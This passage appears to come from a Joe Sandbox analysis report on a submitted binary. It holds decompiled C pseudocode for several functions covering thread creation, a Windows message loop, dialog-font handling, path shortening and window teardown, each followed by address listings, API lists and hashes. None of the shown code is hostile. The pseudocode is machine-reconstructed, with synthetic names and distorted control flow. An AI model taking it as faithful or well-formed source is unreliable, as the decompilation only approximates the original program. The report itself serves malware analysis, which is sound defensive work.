				long _t51;
				void* _t61;
				intOrPtr _t62;
				intOrPtr* _t64;
				void* _t65;

				_t58 = __edx;
				_push(_t64);
				E00435F8A();
				_t27 = E00435F6A(E00435F84());
				if(_t27 != 0) {
					_t51 = _a4;
					 *((intOrPtr*)(_t27 + 0x54)) =  *((intOrPtr*)(_t51 + 0x54));
					 *((intOrPtr*)(_t27 + 0x58)) =  *((intOrPtr*)(_t51 + 0x58));
					_t58 =  *((intOrPtr*)(_t51 + 4));
					_push(_t51);
					 *((intOrPtr*)(_t27 + 4)) =  *((intOrPtr*)(_t51 + 4));
					E00436192(_t48, _t61, _t64, __eflags);
				} else {
					_t64 = _a4;
					if(E00435FBE(E00435F84(), _t64) == 0) {
						ExitThread(GetLastError());
					}
					 *_t64 = GetCurrentThreadId();
				}
				_t73 =  *0x455824;
				if( *0x455824 != 0) {
					_t42 = E0043BEC0(_t73, 0x455824);
					_pop(_t51);
					_t74 = _t42;
					if(_t42 != 0) {
						 *0x455824();
					}
				}
				E00433D61(_t58, _t61, _t64, _t74);
				asm("int3");
				_push(_t51);
				_push(_t48);
				_push(_t61);
				_t9 =  &_v0; // 0x416327
				_t62 =  *_t9;
				_v20 = 0;
				_t75 = _t62;
				if(_t62 != 0) {
					_push(_t64);
					E00435F8A();
					_t65 = E004381D6(1, 0x214);
					__eflags = _t65;
					if(__eflags == 0) {
						L16:
						_push(_t65);
						E004316F6(0, _t62, _t65, __eflags);
						__eflags = _v12;
						if(_v12 != 0) {
							E00431D64(_v12);
						}
						_t33 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E00436178(0, _t58, _t62, __eflags) + 0x6c)));
						_push(_t65);
						E00436018(0, _t62, _t65, __eflags);
						 *(_t65 + 4) =  *(_t65 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t65 + 0x58)) = _a12;
						_t38 = _a20;
						 *((intOrPtr*)(_t65 + 0x54)) = _t62;
						__eflags = _t38;
						if(_t38 == 0) {
							_t18 =  &_a8; // 0x416327
							_t38 = _t18;
						}
						_t33 = CreateThread(_v0, _a4, E00433DA2, _t65, _a16, _t38);
						__eflags = _t33;
						if(__eflags == 0) {
							_v12 = GetLastError();
							goto L16;
						}
					}
				} else {
					_t40 = E00431D3E(_t75);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t40 = 0x16;
					E004367E9(_t58, _t62, _t64);
					_t33 = 0;
				}
				return _t33;
			}





















                  0x00433da2
                  0x00433da7
                  0x00433da8
                  0x00433db3
                  0x00433dba
                  0x00433de6
                  0x00433dec
                  0x00433df2
                  0x00433df5
                  0x00433df8
                  0x00433df9
                  0x00433dfc
                  0x00433dbc
                  0x00433dbc
                  0x00433dcd
                  0x00433dd6
                  0x00433dd6
                  0x00433de2
                  0x00433de2
                  0x00433e01
                  0x00433e08
                  0x00433e0f
                  0x00433e14
                  0x00433e15
                  0x00433e17
                  0x00433e19
                  0x00433e19
                  0x00433e17
                  0x00433e1f
                  0x00433e24
                  0x00433e2a
                  0x00433e2b
                  0x00433e2c
                  0x00433e2d
                  0x00433e2d
                  0x00433e32
                  0x00433e35
                  0x00433e37
                  0x00433e55
                  0x00433e56
                  0x00433e67
                  0x00433e6b
                  0x00433e6d
                  0x00433eb9
                  0x00433eb9
                  0x00433eba
                  0x00433ec0
                  0x00433ec3
                  0x00433ec8
                  0x00433ecd
                  0x00433ece
                  0x00433ece
                  0x00433e6f
                  0x00433e74
                  0x00433e77
                  0x00433e78
                  0x00433e80
                  0x00433e84
                  0x00433e87
                  0x00433e8c
                  0x00433e8f
                  0x00433e91
                  0x00433e93
                  0x00433e93
                  0x00433e93
                  0x00433ea6
                  0x00433eac
                  0x00433eae
                  0x00433eb6
                  0x00000000
                  0x00433eb6
                  0x00433eae
                  0x00433e39
                  0x00433e39
                  0x00433e3e
                  0x00433e3f
                  0x00433e40
                  0x00433e41
                  0x00433e42
                  0x00433e43
                  0x00433e49
                  0x00433e51
                  0x00433e51
                  0x00433ed4

                  APIs
                  • ___set_flsgetvalue.LIBCMT ref: 00433DA8
                    • Part of subcall function 00435F8A: TlsGetValue.KERNEL32(?,00436116,?,?,38A11573), ref: 00435F93
                    • Part of subcall function 00435F8A: __decode_pointer.LIBCMT ref: 00435FA5
                    • Part of subcall function 00435F8A: TlsSetValue.KERNEL32(00000000,?,38A11573), ref: 00435FB4
                  • ___fls_getvalue@4.LIBCMT ref: 00433DB3
                    • Part of subcall function 00435F6A: TlsGetValue.KERNEL32(?,?,00433DB8,00000000), ref: 00435F78
                  • ___fls_setvalue@8.LIBCMT ref: 00433DC6
                    • Part of subcall function 00435FBE: __decode_pointer.LIBCMT ref: 00435FCF
                  • GetLastError.KERNEL32(00000000,?,00000000), ref: 00433DCF
                  • ExitThread.KERNEL32 ref: 00433DD6
                  • GetCurrentThreadId.KERNEL32 ref: 00433DDC
                  • __freefls@4.LIBCMT ref: 00433DFC
                  • __IsNonwritableInCurrentImage.LIBCMT ref: 00433E0F
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                  • String ID:
                  • API String ID: 1925773019-0
                  • Opcode ID: c8c825772063ffb0e1c36542545d0ffbfd7b0d2f956fa4bcfaf61e1b123cdc9f
                  • Instruction ID: 4b48061d48abbb118d3af9a1d6b6224fcdbc60defc697df6f852148146c71389
                  • Opcode Fuzzy Hash: c8c825772063ffb0e1c36542545d0ffbfd7b0d2f956fa4bcfaf61e1b123cdc9f
                  • Instruction Fuzzy Hash: 41016734500A01AFC7047F62D90A95E7BE9AF4D30AF14956AF9048B323DB3DD942CAAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00429EA2, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E00429EA2(void* __ebx, void** __ecx, void* __edx, void* __esi, char* _a4, short _a8) {
				signed int _v8;
				short _v72;
				char* _v76;
				signed int _v80;
				signed int* _v84;
				signed int _v88;
				intOrPtr _v92;
				void* __edi;
				signed int _t54;
				void* _t65;
				char* _t69;
				short* _t70;
				signed int _t72;
				signed int* _t83;
				short* _t84;
				void* _t93;
				signed int* _t101;
				signed int _t102;
				void** _t103;
				intOrPtr _t105;
				signed int _t107;
				signed int _t109;
				void* _t110;

				_t104 = __esi;
				_t99 = __edx;
				_t82 = __ebx;
				_t54 =  *0x463404; // 0x38a11573
				_v8 = _t54 ^ _t109;
				_t103 = __ecx;
				_v76 = _a4;
				if(__ecx[1] != 0) {
					_push(__ebx);
					_push(__esi);
					_t83 = GlobalLock( *__ecx);
					_v84 = _t83;
					_v88 = 0 | _t83[0] == 0x0000ffff;
					_v80 = E00429CD6(_t83);
					_t105 = (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1 + (0 | _v88 != 0x00000000) + (0 | _v88 != 0x00000000) + 1;
					_v92 = _t105;
					if(_v88 == 0) {
						 *_t83 =  *_t83 | 0x00000040;
					} else {
						_t83[3] = _t83[3] | 0x00000040;
					}
					if(lstrlenA(_v76) >= 0x20) {
						L15:
						_t65 = 0;
					} else {
						_t69 = _t105 + MultiByteToWideChar(0, 0, _v76, 0xffffffff,  &_v72, 0x20) * 2;
						_v76 = _t69;
						if(_t69 < _t105) {
							goto L15;
						} else {
							_t70 = E00429D1D(_t83);
							_t93 = 0;
							_t84 = _t70;
							if(_v80 != 0) {
								_t93 = _t105 + 2 + E00431BE4(_t84 + _t105) * 2;
							}
							_t33 =  &(_v76[3]); // 0x3
							_t101 = _v84;
							_t36 = _t84 + 3; // 0x3
							_t72 = _t93 + _t36 & 0xfffffffc;
							_t107 = _t84 + _t33 & 0xfffffffc;
							_v80 = _t72;
							if(_v88 == 0) {
								_t102 =  *(_t101 + 8) & 0x0000ffff;
							} else {
								_t102 =  *(_t101 + 0x10) & 0x0000ffff;
							}
							if(_v76 == _t93 || _t102 <= 0) {
								L17:
								 *_t84 = _a8;
								_t99 =  &_v72;
								E0041E0F0(_t103, _t107, _t84 + _v92, _v76 - _v92,  &_v72, _v76 - _v92);
								_t103[1] = _t103[1] + _t107 - _v80;
								GlobalUnlock( *_t103);
								_t103[2] = _t103[2] & 0x00000000;
								_t65 = 1;
							} else {
								_t99 = _t103[1];
								_t97 = _t99 - _t72 + _v84;
								if(_t99 - _t72 + _v84 <= _t99) {
									E0041E0F0(_t103, _t107, _t107, _t97, _t72, _t97);
									_t110 = _t110 + 0x10;
									goto L17;
								} else {
									goto L15;
								}
							}
						}
					}
					_pop(_t104);
					_pop(_t82);
				} else {
					_t65 = 0;
				}
				return E00430650(_t65, _t82, _v8 ^ _t109, _t99, _t103, _t104);
			}


























                  0x00429ea2
                  0x00429ea2
                  0x00429ea2
                  0x00429eaa
                  0x00429eb1
                  0x00429eb8
                  0x00429ebe
                  0x00429ec1
                  0x00429eca
                  0x00429ecb
                  0x00429ed4
                  0x00429ee5
                  0x00429ee8
                  0x00429ef0
                  0x00429f06
                  0x00429f08
                  0x00429f0b
                  0x00429f13
                  0x00429f0d
                  0x00429f0d
                  0x00429f0d
                  0x00429f22
                  0x00429fa0
                  0x00429fa0
                  0x00429f24
                  0x00429f39
                  0x00429f3e
                  0x00429f41
                  0x00000000
                  0x00429f43
                  0x00429f44
                  0x00429f4a
                  0x00429f4c
                  0x00429f51
                  0x00429f5d
                  0x00429f5d
                  0x00429f64
                  0x00429f68
                  0x00429f6b
                  0x00429f6f
                  0x00429f72
                  0x00429f79
                  0x00429f7c
                  0x00429f84
                  0x00429f7e
                  0x00429f7e
                  0x00429f7e
                  0x00429f8b
                  0x00429fb0
                  0x00429fb7
                  0x00429fc0
                  0x00429fc8
                  0x00429fd5
                  0x00429fd8
                  0x00429fde
                  0x00429fe4
                  0x00429f92
                  0x00429f92
                  0x00429f99
                  0x00429f9e
                  0x00429fa8
                  0x00429fad
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00429f9e
                  0x00429f8b
                  0x00429f41
                  0x00429fe5
                  0x00429fe6
                  0x00429ec3
                  0x00429ec3
                  0x00429ec3
                  0x00429ff3

                  APIs
                  • GlobalLock.KERNEL32 ref: 00429ECE
                  • lstrlenA.KERNEL32(?), ref: 00429F19
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 00429F33
                  • _wcslen.LIBCMT ref: 00429F57
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
                  • String ID: System
                  • API String ID: 4253822919-3470857405
                  • Opcode ID: f20dbc8f9ba238a26da2406e4875a9fc71124662fb509fc0612855e41ff5078a
                  • Instruction ID: efb83644c2112a5dfae5475b0fc38a031e3ec5a019a84b7450d3f46c2a4277a5
                  • Opcode Fuzzy Hash: f20dbc8f9ba238a26da2406e4875a9fc71124662fb509fc0612855e41ff5078a
                  • Instruction Fuzzy Hash: 81411471A002259FCB14DFA1D985AAEFBB4FF04304F54812AE412DB285E7789D45CB54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040E9F9, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0040E9F9(intOrPtr* __ecx, signed int _a4) {
				int _v8;
				int _v12;
				int _v16;
				struct tagMSG* _v20;
				struct HWND__* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t48;
				struct tagMSG* _t49;
				signed int _t51;
				void* _t54;
				void* _t56;
				int _t59;
				long _t62;
				signed int _t66;
				void* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;

				_t70 = __ecx;
				_t74 = __ecx;
				_v16 = 1;
				_v12 = 0;
				if((_a4 & 0x00000004) == 0) {
					L2:
					_v8 = 0;
					L3:
					_t48 = GetParent( *(_t74 + 0x20));
					 *(_t74 + 0x3c) =  *(_t74 + 0x3c) | 0x00000018;
					_v24 = _t48;
					_t49 = E00415AE2(_t76);
					_t69 = UpdateWindow;
					_v20 = _t49;
					while(1) {
						_t77 = _v16;
						if(_v16 == 0) {
							goto L15;
						}
						while(1) {
							L15:
							_t51 = E00416049(_t70, 0, _t74, _t77);
							if(_t51 == 0) {
								break;
							}
							if(_v8 != 0) {
								_t59 = _v20->message;
								if(_t59 == 0x118 || _t59 == 0x104) {
									E00412C34(_t74, 1);
									UpdateWindow( *(_t74 + 0x20));
									_v8 = 0;
								}
							}
							_t71 = _t74;
							_t54 =  *((intOrPtr*)( *_t74 + 0x88))();
							_t82 = _t54;
							if(_t54 == 0) {
								_t45 = _t74 + 0x3c;
								 *_t45 =  *(_t74 + 0x3c) & 0xffffffe7;
								__eflags =  *_t45;
								return  *((intOrPtr*)(_t74 + 0x44));
							} else {
								_push(_v20);
								_t56 = E00415EC6(_t69, _t71, 0, _t74, _t82);
								_pop(_t70);
								if(_t56 != 0) {
									_v16 = 1;
									_v12 = 0;
								}
								if(PeekMessageA(_v20, 0, 0, 0, 0) == 0) {
									while(1) {
										_t77 = _v16;
										if(_v16 == 0) {
											goto L15;
										}
										goto L4;
									}
								}
								continue;
							}
						}
						_push(0);
						E00414E3D();
						return _t51 | 0xffffffff;
						L4:
						__eflags = PeekMessageA(_v20, 0, 0, 0, 0);
						if(__eflags != 0) {
							goto L15;
						} else {
							__eflags = _v8;
							if(_v8 != 0) {
								_t70 = _t74;
								E00412C34(_t74, 1);
								UpdateWindow( *(_t74 + 0x20));
								_v8 = 0;
							}
							__eflags = _a4 & 0x00000001;
							if((_a4 & 0x00000001) == 0) {
								__eflags = _v24;
								if(_v24 != 0) {
									__eflags = _v12;
									if(_v12 == 0) {
										SendMessageA(_v24, 0x121, 0,  *(_t74 + 0x20));
									}
								}
							}
							__eflags = _a4 & 0x00000002;
							if(__eflags != 0) {
								L13:
								_v16 = 0;
								continue;
							} else {
								_t62 = SendMessageA( *(_t74 + 0x20), 0x36a, 0, _v12);
								_v12 = _v12 + 1;
								__eflags = _t62;
								if(__eflags != 0) {
									continue;
								}
								goto L13;
							}
						}
					}
				}
				_t66 = E00412B38(__ecx);
				_v8 = 1;
				_t76 = _t66 & 0x10000000;
				if((_t66 & 0x10000000) == 0) {
					goto L3;
				}
				goto L2;
			}























                  0x0040e9f9
                  0x0040ea0d
                  0x0040ea0f
                  0x0040ea12
                  0x0040ea15
                  0x0040ea26
                  0x0040ea26
                  0x0040ea29
                  0x0040ea2c
                  0x0040ea32
                  0x0040ea36
                  0x0040ea39
                  0x0040ea3e
                  0x0040ea44
                  0x0040eab4
                  0x0040eab4
                  0x0040eab7
                  0x00000000
                  0x00000000
                  0x0040eab9
                  0x0040eab9
                  0x0040eab9
                  0x0040eac0
                  0x00000000
                  0x00000000
                  0x0040eac5
                  0x0040eaca
                  0x0040ead2
                  0x0040eadf
                  0x0040eae7
                  0x0040eae9
                  0x0040eae9
                  0x0040ead2
                  0x0040eaee
                  0x0040eaf0
                  0x0040eaf6
                  0x0040eaf8
                  0x0040eb2f
                  0x0040eb2f
                  0x0040eb2f
                  0x00000000
                  0x0040eafa
                  0x0040eafa
                  0x0040eafd
                  0x0040eb02
                  0x0040eb05
                  0x0040eb07
                  0x0040eb0e
                  0x0040eb0e
                  0x0040eb20
                  0x0040eab4
                  0x0040eab4
                  0x0040eab7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040eab7
                  0x0040eab4
                  0x00000000
                  0x0040eb20
                  0x0040eaf8
                  0x0040eb24
                  0x0040eb25
                  0x00000000
                  0x0040ea49
                  0x0040ea56
                  0x0040ea58
                  0x00000000
                  0x0040ea5a
                  0x0040ea5a
                  0x0040ea5d
                  0x0040ea61
                  0x0040ea63
                  0x0040ea6b
                  0x0040ea6d
                  0x0040ea6d
                  0x0040ea70
                  0x0040ea74
                  0x0040ea76
                  0x0040ea79
                  0x0040ea7b
                  0x0040ea7e
                  0x0040ea8c
                  0x0040ea8c
                  0x0040ea7e
                  0x0040ea79
                  0x0040ea92
                  0x0040ea96
                  0x0040eab1
                  0x0040eab1
                  0x00000000
                  0x0040ea98
                  0x0040eaa4
                  0x0040eaaa
                  0x0040eaad
                  0x0040eaaf
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040eaaf
                  0x0040ea96
                  0x0040ea58
                  0x0040eab4
                  0x0040ea17
                  0x0040ea1c
                  0x0040ea1f
                  0x0040ea24
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • GetParent.USER32(?), ref: 0040EA2C
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EA50
                  • UpdateWindow.USER32(?), ref: 0040EA6B
                  • SendMessageA.USER32(?,00000121,00000000,?), ref: 0040EA8C
                  • SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 0040EAA4
                  • UpdateWindow.USER32(?), ref: 0040EAE7
                  • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 0040EB18
                    • Part of subcall function 00412B38: GetWindowLongA.USER32 ref: 00412B43
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Message$Window$PeekSendUpdate$LongParent
                  • String ID:
                  • API String ID: 2853195852-0
                  • Opcode ID: c229e80b1f278fb07b4cfe83ed8274fb3bea46c667a2c2ac9cca65a0f4ede5b8
                  • Instruction ID: 9cec2da762fcf1ae17ec792ded61e67ab4686bf0a0b4de212a99b23e2336cc78
                  • Opcode Fuzzy Hash: c229e80b1f278fb07b4cfe83ed8274fb3bea46c667a2c2ac9cca65a0f4ede5b8
                  • Instruction Fuzzy Hash: C5418D30A00245ABCB21DFA7C944AAFBFB4FF85704F10892EE541B22E1D7799950CF19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004268B6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 74%
                  			E004268B6(void* __ecx, void* __edx, void* __eflags, CHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t32;
				void* _t34;
				intOrPtr _t35;
				char* _t36;
				int _t38;
				CHAR* _t40;
				CHAR* _t47;
				void* _t49;
				void* _t51;
				intOrPtr _t54;
				intOrPtr _t57;
				intOrPtr _t61;
				void* _t62;
				CHAR* _t64;
				void* _t66;
				int _t67;
				intOrPtr _t68;

				_t62 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(_t49);
				_push(_t66);
				_t64 = _a4;
				_push(0xffffffff);
				_t32 = E00424A91(_t64);
				_t76 = _t32;
				if(_t32 == 0) {
					E00406436(_t49, __ecx, _t64, _t66, _t76);
				}
				_t67 = lstrlenA(_t64);
				_v8 = _t67;
				_t34 = E0042FDDC(_t64, 0, 0);
				_t57 = _v8;
				_t51 = _t34 - 1;
				_t68 = _t67 - _t51;
				_t35 = _t68 + _t64;
				_v12 = _t35;
				if(_a8 < _t57) {
					if(_a8 >= _t51) {
						__eflags =  *_t64 - 0x5c;
						_t36 =  &(_t64[2]);
						_a4 = _t36;
						if( *_t64 == 0x5c) {
							__eflags = _t64[1] - 0x5c;
							if(_t64[1] == 0x5c) {
								while(1) {
									__eflags =  *_t36 - 0x5c;
									if( *_t36 == 0x5c) {
										goto L13;
									}
									_t36 = E004348EB(_t62, _t64, _a4);
									_a4 = _t36;
								}
							}
						}
						L13:
						__eflags = _t68 - 3;
						if(_t68 > 3) {
							do {
								_t47 = E004348EB(_t62, _t64, _a4);
								__eflags =  *_t47 - 0x5c;
								_a4 = _t47;
							} while ( *_t47 != 0x5c);
						}
						_t68 = _a4 - _t64;
						__eflags = _a8 - _t68 + _t51 + 5;
						if(_a8 >= _t68 + _t51 + 5) {
							while(1) {
								_t38 = lstrlenA(_a4);
								__eflags = _t38 + _t68 + 4 - _a8;
								if(_t38 + _t68 + 4 > _a8) {
									goto L18;
								} else {
									break;
								}
								do {
									L18:
									_t40 = E004348EB(_t62, _t64, _a4);
									__eflags =  *_t40 - 0x5c;
									_a4 = _t40;
								} while ( *_t40 != 0x5c);
							}
							__eflags = _t68;
							if(_t68 < 0) {
								L22:
								_t68 = _a8;
							} else {
								__eflags = _t68 - _a8;
								if(_t68 >= _a8) {
									goto L22;
								}
							}
							_t54 = _v8;
							E004059F9(_t64, _t68 + _t64, _t68 + _t64, _t54 - _t68 + 1, "\\...", 5);
							__eflags = _t54 + 1;
							_t35 = E0040490E(_t54 + 1, _t62, _t64, _t68 + _t64, _t64, _t54 + 1, _a4);
						} else {
							_push(_v12);
							_push(_v8 + 1);
							goto L7;
						}
					} else {
						if(_a12 != 0) {
							_push(_t35);
							_t61 = _t57 + 1;
							__eflags = _t61;
							_push(_t61);
							L7:
							_push(_t64);
							_t35 = E00414FEE(_t51, _t62, _t64, _t68);
						} else {
							 *_t64 = 0;
						}
					}
				}
				return _t35;
			}


























                  0x004268b6
                  0x004268bb
                  0x004268bc
                  0x004268bd
                  0x004268be
                  0x004268c0
                  0x004268c3
                  0x004268c6
                  0x004268cb
                  0x004268cd
                  0x004268cf
                  0x004268cf
                  0x004268df
                  0x004268e2
                  0x004268e5
                  0x004268ea
                  0x004268ef
                  0x004268f0
                  0x004268f5
                  0x004268f8
                  0x004268fb
                  0x00426904
                  0x00426925
                  0x00426928
                  0x0042692b
                  0x0042692e
                  0x00426930
                  0x00426934
                  0x00426944
                  0x00426944
                  0x00426947
                  0x00000000
                  0x00000000
                  0x0042693b
                  0x00426941
                  0x00426941
                  0x00426944
                  0x00426934
                  0x00426949
                  0x00426949
                  0x0042694c
                  0x0042694e
                  0x00426951
                  0x00426956
                  0x00426959
                  0x0042695c
                  0x0042694e
                  0x00426962
                  0x00426968
                  0x0042696b
                  0x00426990
                  0x00426993
                  0x00426999
                  0x0042699c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0042697f
                  0x0042697f
                  0x00426982
                  0x00426987
                  0x0042698b
                  0x0042698b
                  0x0042697f
                  0x0042699e
                  0x004269a0
                  0x004269a7
                  0x004269a7
                  0x004269a2
                  0x004269a2
                  0x004269a5
                  0x00000000
                  0x00000000
                  0x004269a5
                  0x004269aa
                  0x004269bd
                  0x004269c5
                  0x004269c8
                  0x0042696d
                  0x00426970
                  0x00426974
                  0x00000000
                  0x00426974
                  0x00426906
                  0x0042690a
                  0x00426914
                  0x00426915
                  0x00426915
                  0x00426916
                  0x00426917
                  0x00426917
                  0x00426918
                  0x0042690c
                  0x0042690c
                  0x0042690c
                  0x0042690a
                  0x00426904
                  0x004269d4

                  APIs
                  • lstrlenA.KERNEL32(?,?,000000FF), ref: 004268D5
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                    • Part of subcall function 00414FEE: _strcpy_s.LIBCMT ref: 00414FFC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Exception@8H_prolog3Throw_strcpy_slstrlen
                  • String ID: \...
                  • API String ID: 2411880420-1167917071
                  • Opcode ID: 5c1896904efdc8856ffc91947ccfd4409c0691e1e4a669871dd6449de70afc12
                  • Instruction ID: 209274568c99b8f927e6ccd35cc04ed4cda3847a283bcf010ece59bbc5279a2f
                  • Opcode Fuzzy Hash: 5c1896904efdc8856ffc91947ccfd4409c0691e1e4a669871dd6449de70afc12
                  • Instruction Fuzzy Hash: 1A311BB1A00269BFDF119F15DC40AAE7B64EB41358F52812FFC159B241DB389EC1CB99
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0040EF7F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E0040EF7F(intOrPtr* __ecx) {
				struct HWND__* _v40;
				struct HWND__* _v44;
				intOrPtr _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t34;
				long _t43;
				struct HWND__* _t48;
				intOrPtr* _t63;
				signed int _t64;
				void* _t69;
				intOrPtr _t71;
				intOrPtr* _t72;

				_t72 = __ecx;
				_t69 = E00415AD9();
				if(_t69 != 0) {
					if( *((intOrPtr*)(_t69 + 0x20)) == __ecx) {
						 *((intOrPtr*)(_t69 + 0x20)) = 0;
					}
					if( *((intOrPtr*)(_t69 + 0x24)) == _t72) {
						 *((intOrPtr*)(_t69 + 0x24)) = 0;
					}
				}
				_t63 =  *((intOrPtr*)(_t72 + 0x48));
				if(_t63 != 0) {
					 *((intOrPtr*)( *_t63 + 0x50))();
					 *((intOrPtr*)(_t72 + 0x48)) = 0;
				}
				_t64 =  *(_t72 + 0x4c);
				if(_t64 != 0) {
					 *((intOrPtr*)( *_t64 + 4))(1);
				}
				 *(_t72 + 0x4c) =  *(_t72 + 0x4c) & 0x00000000;
				_t83 =  *(_t72 + 0x3c) & 1;
				if(( *(_t72 + 0x3c) & 1) != 0) {
					_t71 =  *((intOrPtr*)(E0041F396(1, _t64, _t69, _t72, _t83) + 0x3c));
					if(_t71 != 0) {
						_t85 =  *(_t71 + 0x20);
						if( *(_t71 + 0x20) != 0) {
							E00431160(_t71,  &_v52, 0, 0x30);
							_t48 =  *(_t72 + 0x20);
							_v44 = _t48;
							_v40 = _t48;
							_v52 = 0x2c;
							_v48 = 1;
							SendMessageA( *(_t71 + 0x20), 0x405, 0,  &_v52);
						}
					}
				}
				_t34 = GetWindowLongA( *(_t72 + 0x20), 0xfffffffc);
				_t61 = _t34;
				E0040ED96(_t72, _t85);
				if(GetWindowLongA( *(_t72 + 0x20), 0xfffffffc) == _t34) {
					_t43 =  *( *((intOrPtr*)( *_t72 + 0xf8))());
					if(_t43 != 0) {
						SetWindowLongA( *(_t72 + 0x20), 0xfffffffc, _t43);
					}
				}
				E0040EEC5(_t61, _t72);
				return  *((intOrPtr*)( *_t72 + 0x11c))();
			}



















                  0x0040ef8a
                  0x0040ef91
                  0x0040ef97
                  0x0040ef9c
                  0x0040efc1
                  0x0040efc1
                  0x0040efc7
                  0x0040efc9
                  0x0040efc9
                  0x0040efc7
                  0x0040efcc
                  0x0040efd1
                  0x0040efd5
                  0x0040efd8
                  0x0040efd8
                  0x0040efdb
                  0x0040efe3
                  0x0040efe8
                  0x0040efe8
                  0x0040efeb
                  0x0040efef
                  0x0040eff2
                  0x0040eff9
                  0x0040effe
                  0x0040f000
                  0x0040f004
                  0x0040f00e
                  0x0040f013
                  0x0040f019
                  0x0040f01c
                  0x0040f02d
                  0x0040f034
                  0x0040f037
                  0x0040f037
                  0x0040f004
                  0x0040effe
                  0x0040f049
                  0x0040f04d
                  0x0040f04f
                  0x0040f05e
                  0x0040f06a
                  0x0040f06e
                  0x0040f076
                  0x0040f076
                  0x0040f06e
                  0x0040f07e
                  0x0040f091

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
